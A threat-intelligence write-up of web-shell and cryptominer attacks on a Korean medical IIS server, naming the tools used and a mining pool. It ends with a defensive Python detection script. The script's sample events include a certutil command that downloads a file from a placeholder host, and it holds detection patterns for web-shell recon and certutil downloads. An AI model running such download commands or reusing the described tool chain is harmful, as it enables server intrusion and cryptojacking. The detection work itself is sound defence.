Recent attacks against a Korean medical institution’s Windows IIS server, where the attackers used unpatched vulnerabilities or subpar server management to install coin miners, are evidence that threat actors are targeting vulnerable web servers.
The targeted server’s path names suggest a Picture Archiving and Communication System (PACS) was present, indicating that attackers may be targeting specific software installations on medical institution servers. This highlights the importance of keeping web servers patched and securely managed to prevent unauthorized access and malicious software installations.
An attack targeted a web server potentially containing a PACS system, a medical image management application. The server experienced two separate web shell upload attempts, likely due to PACS vulnerabilities or a security misconfiguration.
Evidence suggests two Chinese-speaking threat actors were involved, based on the tools used (Cpolar, RingQ) and accompanying Chinese annotations, which aligns with trends of Chinese-speaking actors targeting vulnerable Korean web servers.
They exploited a web server vulnerability to upload web shells (Chopper, Behinder) and then executed commands to gather system information (whoami, ipconfig, etc.). Next, the privilege escalation tool BadPotato and the tunneling tool Cpolar were installed.
The preference for Cpolar over Ngrok likely indicates a Chinese-speaking attacker. A CoinMiner downloader script (1.bat) with Chinese annotations was deployed along with the CoinMiner itself; the script likely establishes persistence and automates the download and installation of the CoinMiner.
The attack leveraged a downloaded malware package to install not only the XMRig cryptominer but also a collection of malicious tools. Web shells such as Caidao and ASPXspy provided remote access, while privilege escalation tools such as GodPotato and PrintNotifyPotato aided in gaining administrative control.
Port forwarding tools (Frpc, Lcx) and user account creation malware (useradd.exe) gave the attacker persistence and easier re-entry; the attacker then set up the XMRig miner to connect to the pool “sinmaxinter[.]top:7005”.
The attacker leveraged initial web shell access (Godzilla, Chopper, and Behinder) to gather system information (whoami, systeminfo, and netstat) and then deployed Certutil to download further tools.
These included tools for gaining more privileges (GodPotato, PrintNotifyPotato, and the CVE-2021-1732 exploit), tools for exploring networks (Fscan and remote shell), a tool for communicating (Netcat), and a Chinese-language post-exploitation agent (Ladon) that could scan, gain more privileges, steal credentials, and set up reverse shells.
According to ASEC, attackers used the Chinese-linked injector tool RingQ to deliver encrypted malware (“main.txt”) that bypassed file-based detection.
Finally, they deployed an ASPX downloader that fetched and ran a memory-resident XMRig CoinMiner on the compromised system, where the CoinMiner connected to a pool of IP addresses for cryptocurrency mining.
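Two of the behaviours described above (an IIS worker process spawning reconnaissance commands on behalf of a web shell, and certutil being abused as a downloader) are easy to surface from process-creation telemetry. The detection below is an added example, not code from ASEC or from the report; the events it scans are constructed in Sysmon Event ID 1 style, and the download URL in them is a placeholder, not an indicator from the incident.

```python
"""Flag IIS web-shell recon and certutil downloads in process-creation events."""
import re
from typing import Dict, List, Tuple

# Recon/shell binaries a web shell typically launches (page: whoami, ipconfig,
# systeminfo, netstat). cmd.exe/powershell.exe are the usual intermediaries.
RECON = {"whoami.exe", "ipconfig.exe", "systeminfo.exe", "netstat.exe",
         "cmd.exe", "powershell.exe"}
IIS_WORKER = "w3wp.exe"
# certutil -urlcache ... http(s)://... is the LOLBin download pattern.
CERTUTIL_DL = re.compile(r"-urlcache\b.*https?://", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return detection names matched by one process-creation event."""
    hits = []
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    # Rule 1: the IIS worker process has no business spawning shells or recon tools.
    if parent == IIS_WORKER and image in RECON:
        hits.append("iis_webshell_recon")
    # Rule 2: certutil fetching from a URL, regardless of parent.
    if image == "certutil.exe" and CERTUTIL_DL.search(cmdline):
        hits.append("certutil_download")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """(RecordId, detection) for every event that matches a rule."""
    return [(int(e["RecordId"]), h) for e in events for h in classify(e)]


# Constructed sample telemetry (not real data from the incident).
SAMPLE_EVENTS = [
    {"RecordId": "1", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"RecordId": "2", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://placeholder.invalid/main.txt C:\Windows\Temp\main.txt"},
    {"RecordId": "3", "ParentImage": r"C:\Windows\explorer.exe",          # interactive admin: benign
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c ipconfig"},
    {"RecordId": "4", "ParentImage": r"C:\Windows\System32\cmd.exe",      # legitimate certutil use
     "Image": r"C:\Windows\System32\certutil.exe", "CommandLine": r"certutil.exe -hashfile C:\tools\x.exe SHA256"},
]

if __name__ == "__main__":
    for record_id, name in scan(SAMPLE_EVENTS):
        print(f"record {record_id}: {name}")
```

Rule 1 deliberately ignores who spawned cmd.exe further down the tree, so pair it with the child-process chain (w3wp.exe → cmd.exe → whoami.exe) when tuning on real telemetry.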